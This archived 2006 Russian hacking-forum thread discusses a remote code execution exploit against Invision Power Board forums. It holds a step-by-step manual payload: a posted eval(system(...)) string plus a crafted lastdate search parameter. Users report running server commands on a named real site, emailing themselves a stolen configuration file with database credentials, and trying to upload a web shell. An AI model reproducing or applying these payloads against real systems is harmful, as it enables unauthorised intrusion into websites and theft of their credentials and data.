ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.04.2006, 19:40
|
|
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018
Репутация:
117
|
|
на 2.1.x не всегда работает. На 2.0.x всё ок! Отправил на мыло себе conf_global.php =))
|
|
|
28.04.2006, 19:37
|
|
Новичок
Регистрация: 28.02.2006
Сообщений: 21
Провел на форуме:
125991
Репутация:
0
|
|
Сообщение от degeneration x
на 2.1.x не всегда работает. На 2.0.x всё ок! Отправил на мыло себе conf_global.php =))
А это какой командой если не секрет ?
|
|
|
|
02.05.2006, 15:53
|
|
Новичок
Регистрация: 11.03.2006
Сообщений: 16
Провел на форуме:
22629
Репутация:
2
|
|
Сообщение от Go0o$E
Очень даже хорошо работает exploit! Проверил на lineageii.ru.
Не знаю почему, но на форуме lineageii.ru, у меня не выполняются никакие команды, ни под винду, ни под линукс. Хотя тема создаётся... Если делаю ручками, то тож не пашет.
Кстати часто на форумах сплойт не воспроизводит команды, а ручками всё работает. Может это из-за того что я не правил сплойт...
И ещё: когда я постю сообщение, например
Код:
eval(system(ls)); //'
то при поиске выдаёт файлы, лежащие на сервере, а когда например:
Код:
eval(system(ls -la)); //'
то мне выдаётся:
IPB WARNING [2] system(): Cannot execute a blank command (Line: 1 of /sources/search.php(1236) : regexp code)
Почему так?
Последний раз редактировалось L1on; 02.05.2006 в 16:06..
|
|
|
|
27.04.2006, 16:06
|
|
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939
Репутация:
-4
|
|
да отлично работает =))) просто не на всех форумах
|
|
|
|
27.04.2006, 16:31
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
|
|
|
|
29.04.2006, 12:01
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Для тех у кого не получается со сплойтом, опишу как пользоваться ручками.
1. Постим сообщение eval(system(dir)); //'
2. В поиске ищем по своему нику все сообщения и не забываем поставить галочку на Show results as posts
3. В конце url дописываем &lastdate=z|eval.*?%20//)%23e%00
4. Enter. Выполняется dir.
|
|
|
|
03.05.2006, 21:36
|
|
Новичок
Регистрация: 11.03.2006
Сообщений: 16
Провел на форуме:
22629
Репутация:
2
|
|
Сообщение от Azazel
Для тех у кого не получается со сплойтом, опишу как пользоваться ручками.
1. Постим сообщение eval(system(dir)); //'
2. В поиске ищем по своему нику все сообщения и не забываем поставить галочку на Show results as posts
3. В конце url дописываем &lastdate=z|eval.*?%20//)%23e%00
4. Enter. Выполняется dir.
Вставляю в сообщение eval(system(ls)); //' , выдаёт, как и надо, файлы на сервере, делаю eval(system(id)); //', работает, вообще, работают все команды из одного слова. Но когда пробую например ls -la, или which wget, то пишет ошибку. Но тогда и шелл нельзя залить... Что я делаю не так?
|
|
|
|
27.04.2006, 17:46
|
|
Новичок
Регистрация: 23.04.2006
Сообщений: 5
Провел на форуме:
47463
Репутация:
0
|
|
Так я не пойму, есть шифровка в сплойте или нет!?
|
|
|
|
27.04.2006, 17:52
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
|
|
|
|
27.04.2006, 18:32
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
Хм... У меня сплойт пишет
[~] Create new message ... [ FILED ]
На форуме появляется новая тема с мессагой. В сообщении эта самая шифровка из 95 строки.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид